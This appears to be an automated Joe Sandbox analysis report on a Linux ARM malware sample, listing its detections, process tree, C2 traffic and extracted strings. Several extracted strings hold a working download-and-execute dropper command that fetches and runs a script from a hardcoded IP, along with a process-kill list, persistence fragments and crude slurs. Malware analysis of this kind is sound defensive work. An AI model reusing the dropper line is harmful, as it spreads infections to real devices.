Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:arm5.elf
Analysis ID:1583023
MD5:4b09887a801d61eabb31032837d0ddd4
SHA1:61adff60110349551db664dd786c0d7d9fb5b14a
SHA256:56f9f81acb4735ab3a4e0652ded76b3d4fffc1382fad16b9a89d86f2b018fef4
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Deletes system log files
Manipulation of devices in /dev
Sample deletes itself
Sends malformed DNS queries
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583023
Start date and time:2025-01-01 15:06:03 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 15s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm5.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/0@336/0
  • VT rate limit hit for: tcpdown.su
Command:/tmp/arm5.elf
PID:5453
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:
  • system is lnxubuntu20
  • arm5.elf (PID: 5453, Parent: 5377, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf
    • arm5.elf New Fork (PID: 5455, Parent: 5453)
      • arm5.elf New Fork (PID: 5457, Parent: 5455)
        • arm5.elf New Fork (PID: 5492, Parent: 5457)
        • arm5.elf New Fork (PID: 5494, Parent: 5457)
        • arm5.elf New Fork (PID: 5500, Parent: 5457)
        • arm5.elf New Fork (PID: 5505, Parent: 5457)
        • arm5.elf New Fork (PID: 5507, Parent: 5457)
        • arm5.elf New Fork (PID: 5509, Parent: 5457)
        • arm5.elf New Fork (PID: 5560, Parent: 5457)
        • arm5.elf New Fork (PID: 5562, Parent: 5457)
        • arm5.elf New Fork (PID: 5571, Parent: 5457)
        • arm5.elf New Fork (PID: 5598, Parent: 5457)
        • arm5.elf New Fork (PID: 5603, Parent: 5457)
        • arm5.elf New Fork (PID: 5613, Parent: 5457)
        • arm5.elf New Fork (PID: 5615, Parent: 5457)
        • arm5.elf New Fork (PID: 5624, Parent: 5457)
        • arm5.elf New Fork (PID: 5632, Parent: 5457)
        • arm5.elf New Fork (PID: 5637, Parent: 5457)
        • arm5.elf New Fork (PID: 5648, Parent: 5457)
        • arm5.elf New Fork (PID: 5650, Parent: 5457)
        • arm5.elf New Fork (PID: 5657, Parent: 5457)
        • arm5.elf New Fork (PID: 5663, Parent: 5457)
        • arm5.elf New Fork (PID: 5674, Parent: 5457)
        • arm5.elf New Fork (PID: 5676, Parent: 5457)
        • arm5.elf New Fork (PID: 5687, Parent: 5457)
        • arm5.elf New Fork (PID: 5692, Parent: 5457)
        • arm5.elf New Fork (PID: 5702, Parent: 5457)
        • arm5.elf New Fork (PID: 5705, Parent: 5457)
        • arm5.elf New Fork (PID: 5713, Parent: 5457)
        • arm5.elf New Fork (PID: 5716, Parent: 5457)
        • arm5.elf New Fork (PID: 5726, Parent: 5457)
        • arm5.elf New Fork (PID: 5733, Parent: 5457)
        • arm5.elf New Fork (PID: 5736, Parent: 5457)
        • arm5.elf New Fork (PID: 5742, Parent: 5457)
        • arm5.elf New Fork (PID: 5749, Parent: 5457)
        • arm5.elf New Fork (PID: 5752, Parent: 5457)
        • arm5.elf New Fork (PID: 5764, Parent: 5457)
        • arm5.elf New Fork (PID: 5766, Parent: 5457)
        • arm5.elf New Fork (PID: 5774, Parent: 5457)
        • arm5.elf New Fork (PID: 5777, Parent: 5457)
        • arm5.elf New Fork (PID: 5782, Parent: 5457)
      • arm5.elf New Fork (PID: 5459, Parent: 5455)
        • arm5.elf New Fork (PID: 5461, Parent: 5459)
  • sh (PID: 5483, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 5483, Parent: 1588, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • gdm3 New Fork (PID: 5488, Parent: 1400)
  • Default (PID: 5488, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5489, Parent: 1400)
  • Default (PID: 5489, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5521, Parent: 1)
  • systemd-user-runtime-dir (PID: 5521, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm5.elfAvira: detected
Source: arm5.elfReversingLabs: Detection: 52%
Source: arm5.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: arm5.elfString: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: arm5.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch/tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.d

Networking

barindex
Source: global trafficDNS traffic detected: malformed DNS query: tcpdown.suo. [malformed]
Source: global trafficTCP traffic: 192.168.2.13:53038 -> 23.94.37.42:2601
Source: global trafficTCP traffic: 192.168.2.13:52438 -> 107.175.130.16:7722
Source: /tmp/arm5.elf (PID: 5453)Socket: 127.0.0.1:39123Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su|!
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suo. [malformed]
Source: arm5.elfString found in binary or memory: http://154.216.18.192/auto.sh
Source: arm5.elfString found in binary or memory: http://154.216.18.192/auto.sh;
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch/tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.d
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 727, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 914, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 917, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 1805, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 1884, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 2961, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5459)SIGKILL sent: pid: 5483, result: successfulJump to behavior
Source: classification engineClassification label: mal72.troj.evad.linELF@0/0@336/0

Data Obfuscation

barindex
Source: /tmp/arm5.elf (PID: 5457)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5483)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5483)Directory: <invalid fd (8)>/..Jump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5459)File opened: /proc/117/cmdlineJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/arm5.elf (PID: 5457)Log files deleted: /var/log/kern.logJump to behavior
Source: /tmp/arm5.elf (PID: 5453)File: /tmp/arm5.elfJump to behavior
Source: /tmp/arm5.elf (PID: 5453)Queries kernel information via 'uname': Jump to behavior
Source: arm5.elf, 5766.1.00007f5cc8042000.00007f5cc8251000.rw-.sdmpBinary or memory string: ,/var/lib/vmwareD
Source: arm5.elf, 5766.1.0000563ed3c68000.0000563ed3c8b000.rw-.sdmpBinary or memory string: !/var/lib/vmware/VGAuth!/var/lib/dpkg/triggers1/var/cache/dictionaries-common
Source: arm5.elf, 5766.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmpBinary or memory string: !/tmp1/tmp/vmware-root_727-4290690966!
Source: arm5.elf, 5453.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5492.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5494.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5500.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5505.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5507.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5509.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5560.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5562.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5571.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5598.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5603.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5613.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5615.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5624.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5632.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5637.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmpBinary or memory string: Mx86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: arm5.elf, 5766.1.00007f5cc8042000.00007f5cc8251000.rw-.sdmpBinary or memory string: /var/lib/boltd8/var/lib/vmware<t
Source: arm5.elf, 5766.1.00007f5cc8042000.00007f5cc8251000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerx=
Source: arm5.elf, 5766.1.0000563ed3c68000.0000563ed3c8b000.rw-.sdmpBinary or memory string: !/var/lib/vmware0!/var/lib/udisks21/var/cache/apt/archives/partial
Source: arm5.elf, 5766.1.00007f5cc8042000.00007f5cc8251000.rw-.sdmpBinary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5766.1.0000563ed3c68000.0000563ed3c8b000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: arm5.elf, 5766.1.0000563ed3c68000.0000563ed3c8b000.rw-.sdmpBinary or memory string: !/var/lib/dpkg/parts1/var/lib/vmware/VGAuth/aliasStore;
Source: arm5.elf, 5766.1.00007f5cc8042000.00007f5cc8251000.rw-.sdmpBinary or memory string: /tmp/vmware-root_727-4290690966
Source: arm5.elf, 5766.1.00007f5cc8042000.00007f5cc8251000.rw-.sdmpBinary or memory string: P/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-4IllYeP/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf4/tmp/vmware-root_727-42906909664
Source: arm5.elf, 5453.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5492.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5494.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5500.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5505.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5507.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5509.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5560.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5562.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5571.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5598.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5603.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5613.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5615.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5624.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5632.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5637.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmpBinary or memory string: >V!/etc/qemu-binfmt/arm
Source: arm5.elf, 5453.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5492.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5494.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5500.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5505.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5507.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5509.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5560.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5562.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5571.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5598.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5603.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5613.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5615.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5624.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5632.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmp, arm5.elf, 5637.1.0000563ed3b3a000.0000563ed3c68000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm5.elf, 5766.1.0000563ed3c68000.0000563ed3c8b000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
